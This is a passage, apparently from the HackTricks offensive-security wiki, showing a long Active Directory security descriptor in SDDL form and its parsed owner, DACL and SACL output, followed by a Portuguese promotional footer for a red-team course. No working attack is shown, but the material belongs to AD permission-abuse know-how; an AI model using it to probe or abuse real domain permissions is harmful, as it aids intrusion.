d67a59c72816;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;66437984-c3c5-498f-b269-987819ef484b;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;77b5b886-944a-11d1-aebd-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;a8df7489-c5ea-11d1-bbcb-0080c76670c0;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;a8df7489-c5ea-11d1-bbcb-0080c76670c0;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;1f298a89-de98-47b8-b5cd-572ad53d267e;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;1f298a89-de98-47b8-b5cd-572ad53d267e;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;f0f8ff9a-1191-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;f0f8ff9a-1191-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;f0f8ff9a-1191-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;2cc06e9d-6f7e-426a-8825-0215de176e11;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;5fd424a1-1262-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;5fd424a1-1262-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;3263e3b8-fd6b-4c60-87f2-34bdaa9d69eb;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;28630ebc-41d5-11d1-a9c1-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;28630ebc-41d5-11d1-a9c1-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;bf9679c0-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;3e0abfd0-126a-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;7cb4c7d3-8787-42b0-b438-3c5d479ad31e;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RPWP;5b47d60f-6090-40b2-9f37-2a4de88f3063;;S-1-5-21-3842939050-3880317879-2865463114-526)(OA;CI;RPWP;5b47d60f-6090-40b2-9f37-2a4de88f3063;;S-1-5-21-3842939050-3880317879-2865463114-527)(OA;CI;DTWD;;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;DTWD;;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CCDCLCRPWPLO;f0f8ffac-1191-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;CCDCLCRPWPLO;e8b2aff2-59a7-4eac-9a70-819adef701dd;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;018849b0-a981-11d2-a9ff-00c04f8eedd8;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;018849b0-a981-11d2-a9ff-00c04f8eedd8;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CIIO;SD;;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;SD;;bf967a86-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;SD;;bf967a9c-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;SD;;bf967aa5-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;SD;;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;SD;;5cb41ed0-0e4c-11d0-a286-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;WD;;bf967a9c-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CIIO;SW;9b026da6-0d3c-465c-8bee-5199d7165cba;bf967a86-0de6-11d0-a285-00aa003049e2;CO)(OA;CIIO;SW;9b026da6-0d3c-465c-8bee-5199d7165cba;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;CIIO;CCDCLCSWRPWPDTLOCRSDRCWDWO;;c975c901-6cea-4b6f-8319-d67f45449506;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CIIO;CCDCLCSWRPWPDTLOCRSDRCWDWO;;f0f8ffac-1191-11d0-a060-00aa006c33ed;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CINPIO;RPWPLOSD;;e8b2aff2-59a7-4eac-9a70-819adef701dd;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;CI;RP;b1b3a417-ec55-4191-b327-b72e33e38af2;;NS)(OA;CI;RP;1f298a89-de98-47b8-b5cd-572ad53d267e;;AU)(OA;CI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;LCSWRPWPRC;;;S-1-5-21-3842939050-3880317879-2865463114-5213)(A;CI;LCRPLORC;;;S-1-5-21-3842939050-3880317879-2865463114-5172)(A;CI;LCRPLORC;;;S-1-5-21-3842939050-3880317879-2865463114-5187)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-3842939050-3880317879-2865463114-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)(A;CI;LCRPWPRC;;;AN)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)"
|
|
|
|
Owner : BUILTIN\Administrators
|
|
Group : BUILTIN\Administrators
|
|
DiscretionaryAcl : {Everyone: AccessDenied (WriteData), Everyone: AccessAllowed (WriteExtendedAttributes), NT
|
|
AUTHORITY\ANONYMOUS LOGON: AccessAllowed (CreateDirectories, GenericExecute, ReadPermissions,
|
|
Traverse, WriteExtendedAttributes), NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS: AccessAllowed
|
|
(CreateDirectories, GenericExecute, GenericRead, ReadAttributes, ReadPermissions,
|
|
WriteExtendedAttributes)...}
|
|
SystemAcl : {Everyone: SystemAudit SuccessfulAccess (ChangePermissions, TakeOwnership, Traverse),
|
|
BUILTIN\Administrators: SystemAudit SuccessfulAccess (WriteAttributes), DOMAIN_NAME\Domain Users:
|
|
SystemAudit SuccessfulAccess (WriteAttributes), Everyone: SystemAudit SuccessfulAccess
|
|
(Traverse)...}
|
|
RawDescriptor : System.Security.AccessControl.CommonSecurityDescriptor
|
|
```
|
|
<details>
|
|
|
|
<summary><strong>Aprenda hacking na AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
|
|
|
Outras maneiras de apoiar o HackTricks:
|
|
|
|
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
|
|
* Adquira o [**swag oficial do PEASS & HackTricks**](https://peass.creator-spring.com)
|
|
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
|
|
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-me** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/carlospolopm)**.**
|
|
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
|
|
|
|
</details>
|